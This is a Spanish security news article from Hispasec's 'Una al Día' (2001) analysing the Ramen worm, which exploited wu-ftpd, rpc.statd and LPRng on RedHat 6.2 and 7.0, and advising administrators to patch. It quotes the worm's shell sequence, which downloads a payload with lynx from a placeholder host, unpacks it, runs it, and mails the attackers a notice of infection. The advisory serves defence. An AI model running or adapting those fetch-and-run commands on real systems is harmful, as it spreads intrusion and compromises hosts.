• Saltar al contenido principal
  • Saltar a la barra lateral principal
  • Saltar al pie de página

Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Usted está aquí: Inicio / Vulnerabilidades / Un gusano muy activo afecta a sistemas Linux de todo el mundo

Un gusano muy activo afecta a sistemas Linux de todo el mundo

21 enero, 2001 Por Hispasec Deja un comentario

En los últimos días ha surgido en la red un gusano que ya se encuentra
in the wild. Ramen, nombre que recibe este nuevo patógeno, afecta a
sistemas RedHat 6.2 y RedHat 7.0 aprovechándose de vulnerabilidades
conocidas desde hace tiempo y con parches para ellas en los servicios
rpc, wuftp o LPRng.
Este nuevo gusano ha pillado desprevenida a toda la comunidad Linux,
que no esperaba nada semejante y siempre ha permanecido convencida de
la seguridad de sus sistemas frente a virus y gusanos que tanto
afectan en la actualidad a los sistemas Windows. Pero en esta ocasión,
una elaborada y efectiva colección de herramientas destinadas a
explotar vulnerabilidades ha conseguido poner en jaque a los sistemas
Linux de todo el mundo.

Es falso que no existen virus o gusanos para Linux o Unix, pero en la
actualidad la propia arquitectura de Windows se presenta como una
plataforma más vulnerable ante el ataque de virus en comparación con
la robustez que pueden alcanzar los sistemas Unix convenientemente
administrados. Sin embargo, Ramen representa un serio toque de
atención tanto a la comunidad Unix como a las propias casas antivirus,
que a partir de ahora deberán prestar mayor atención a posibles brotes
de este tipo de especímenes.

Ramen afecta a sistemas RedHat Redhat 6.2 a través de un servicio rpc
explotable o de un wuftpd vulnerable, para los sistemas RedHat 7.0 el
gusano infecta haciendo uso de una vulnerabilidad en LPRng. A su paso,
el gusano deja un rastro de páginas web modificadas en los servidores
atacados, con un gráfico en el que se hace alusión a los tallarines
orientales de marca Ramen. En la página modificada el gusano también
deja la frase «Hackers looooooooooooove noodles,» y aparece firmado
como «RameN Crew». Ya han aparecido hasta servidores de la NASA con
esta huella que da signos evidentes del paso del gusano por el
sistema.

Ramen realiza un escaneo de clases B mediante una exploración SYN
consistente en una versión modificada de synscan. Esta exploración
puede llevar entre 15 y 25 minutos y pretende localizar sistemas
Redhat 6.2 o 7.0. Durante el rastreo Ramen comprueba el anuncio del
tipo de servidor de FTP, sólo comprueba el puerto 21 para esto, si
aparece la cadena «Mon Feb 28» grabará la IP y/o el nombre de host en
el archivo «.w». En cambio, si encuentra la cadena «Wed Aug 9»,
grabará los datos en el archivo «.l». De esta forma realiza una
clasificación de la versión de sistema operativo, RedHat 6.2 en el
primer caso y 7.0 en el segundo.

Tras esto se lanzarán dos scripts diferentes dependiendo de cada
sistema contra las direcciones de dichos archivos. Contra las máquinas
RedHat 6.2 empleará la lista del archivo «.w» ejecutará primero un
exploit contra el wu-ftpd, tras este ataque se ejecutará un exploit
contra rpc.statd en la máquina objetivo. En caso de lograr su objetivo
ejecutará la siguiente secuencia de comandos:

mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
/usr/src/.poop/ramen.tgz»>lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
echo Eat Your Ramen! : mail -s TOADDR -c gb31337@hotmail.com
gb31337@yahoo.com

Destinada a enviar un mensaje con las direcciones de la máquina desde
la que se lanza el ataque y la nueva máquina infectada. El mail se
envía a las direcciones gb31337@hotmail.com y gb31337@yahoo.com

Para atacar a los sistemas con RedHat 7 Ramen emplea un ataque contra
LPRng. Este programa es una implementación de una utilidad de spool de
impresora.

Una vez en el sistema el gusano establece un pequeño servidor HTTP/0.9
en el puerto 27374 que se emplea para servir copias de si mismo al
exterior (esto se realiza a través de inetd en RedHat 6.2 y xinetd en
RedHat 7.0). para reproducirse a si mismo, determina la dirección IP
y elima los servicios vulnerable que le han servido para introducirse
en el sistema. Es decir, en RedHat 6.2 eliminará rpc.statd y en
RedHat 7.0 lpd. De forma adicional añadirá los usuarios «ftp» y
«anonymous» al archivo /etc/ftpusers para cerrar el agujero en
wu-ftpd. Para finalizar modificará todos los archivos index.html por
la página anteriormente descrita.

Para evitar la infección por este gusano es conveniente actualizar los
sistemas RedHat. Todas los parches necesarios para cubrir las
vulnerabilidades descritas se encuentran disponibles en el sitio web
de RedHat. Hay que aclarar, como ya hemos comentado, que los parches
no son específicos para este gusano, sino que cierran vulnerabilidades
detectadas y solucionadas hace tiempo.

Desde Hispasec una vez más recordamos y recomendamos la necesidad de
mantener los sistemas actualizados, labor que deben realizar tanto los
administradores de sistemas en las empresas como los usuarios en sus
equipos domésticos.

Antonio Ropero
antonior@hispasec.com

Más información:

Descripción de Ramen
http://members.home.net/dtmartin24/ramen_worm.txt

Vulnerabilidad en wu-ftp (Securityfocus)
http://www.securityfocus.com/vdb/bottom.html?vid=1387

Vulnerabilidad en rpc.statd (Securityfocus)
http://www.securityfocus.com/vdb/bottom.html?vid=1480

Vulnerabilidad en LPRng (Securityfocus)
<a href="http://www.securityfocus.com/vdb/bottom.html?vid=1712</Ahttp://www.securityfocus.com/vdb/bottom.html?vid=1712</A&lt;

Ramen afecta a la NASA (Securityfocus)
<a href="http://www.securityfocus.com/templates/article.html?id=141</Ahttp://www.securityfocus.com/templates/article.html?id=141</A&lt;

Silicon.com
http://www.silicon.com/public/door?REQUNIQ=979925654&6004REQEVENT=&REQINT1=42151&REQSTR1=newsnow

Linux Today
http://linuxtoday.com/news_story.php3?ltsn=2001-01-18-006-06-SC

Computerworld
http://www.computerworld.com/cwi/stories/0,1199,NAV47-68-84-88_STO56475,00.html

CMPTR
http://www.cmptr.com/view.php?id=502

Acerca de Hispasec

Hispasec Ha escrito 6939 publicaciones.

  • View all posts by Hispasec →
  • Blog

Compártelo:

  • Twitter
  • Facebook
  • LinkedIn
  • Reddit
  • Telegram
  • WhatsApp

Publicaciones relacionadas

Publicado en: Vulnerabilidades

Interacciones con los lectores

Deja una respuesta Cancelar la respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Barra lateral principal

Buscar

Síguenos

siguenos en twitter

UAD360 EDICIÓN 2022

https://www.youtube.com/watch?v=go_CSWK56yU

Populares de UAD

  • Vulnerabilidad zero-day en AWS Glue
  • Campañas de phishing utilizan Flipper Zero como cebo
  • Tamagotchi para hackers: Flipper Zero
  • Evasión de CloudTrail en AWS a través de API no documentada
  • Técnica permite modificar ficheros PDF con firma digital

Entradas recientes

  • Vulnerabilidad zero-day en AWS Glue
  • Evasión de CloudTrail en AWS a través de API no documentada
  • Parches de enero 2023: Microsoft corrige 98 vulnerabilidades
  • UAD se abre a la comunidad
  • Campañas de phishing utilizan Flipper Zero como cebo
  • Vulnerabilidades críticas en productos de Synology
  • Más de dos docenas de errores de WordPress explotados por un nuevo malware de Linux
  • Correo electrónico
  • Facebook
  • LinkedIn
  • RSS
  • Twitter

Footer

UAD

UAD nació a raíz de un inocente comentario en un canal IRC hace 24 años. A través de los archivos, un lector curioso puede ver cómo ha cambiado (o no) la seguridad de la información desde entonces.

Aviso Legal

  • Aviso Legal
  • Términos y Condiciones
  • Política de Privacidad
  • Política de Cookies

Copyright © 2023 · Hispasec Sistemas, S.L. Todos los derechos reservados

Este sitio web utiliza cookies propias y de terceros para fines analíticos y para mostrarte publicidad (tanto general como personalizada) relacionada con tus preferencias en base a un perfil elaborado a partir de tus hábitos de navegación (por ejemplo, páginas visitadas), para optimizar la web y para poder valorar las opiniones de los servicios consultados por los usuarios. Para administrar o deshabilitar estas cookies haz clic en: Configurar Cookies


Rechazar todo Aceptar Todo
Configurar Cookies

Resumen de privacidad

Este sitio web utiliza cookies para mejorar su experiencia mientras navega por el sitio web. De estas, las cookies que se clasifican como necesarias se almacenan en su navegador, ya que son esenciales para el funcionamiento de las funcionalidades básicas del sitio web. También utilizamos cookies de terceros que nos ayudan a analizar y comprender cómo utiliza este sitio web. Estas cookies se almacenarán en su navegador solo con su consentimiento. También tiene la opción de optar por no recibir estas cookies. Pero la exclusión voluntaria de algunas de estas cookies puede afectar su experiencia de navegación.
Necesaria
Siempre activado
Las cookies necesarias son absolutamente esenciales para que el sitio web funcione correctamente. Estas cookies garantizan funcionalidades básicas y características de seguridad del sitio web, de forma anónima.
CookieDuraciónDescripción
cookielawinfo-checkbox-analytics11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Análisis".
cookielawinfo-checkbox-functional11 monthsLa cookie está configurada por el consentimiento de cookies de GDPR para registrar el consentimiento del usuario para las cookies en la categoría "Funcional".
cookielawinfo-checkbox-necessary11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. Las cookies se utilizan para almacenar el consentimiento del usuario para las cookies en la categoría "Necesario".
cookielawinfo-checkbox-others11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Otro.
cookielawinfo-checkbox-performance11 monthsEsta cookie está configurada por el complemento de consentimiento de cookies de GDPR. La cookie se utiliza para almacenar el consentimiento del usuario para las cookies en la categoría "Rendimiento".
viewed_cookie_policy11 monthsLa cookie está configurada por el complemento de consentimiento de cookies de GDPR y se utiliza para almacenar si el usuario ha dado su consentimiento o no para el uso de cookies. No almacena ningún dato personal.
Analítica
Las cookies analíticas se utilizan para comprender cómo interactúan los visitantes con el sitio web. Estas cookies ayudan a proporcionar información sobre métricas, el número de visitantes, la tasa de rebote, la fuente de tráfico, etc.
GUARDAR Y ACEPTAR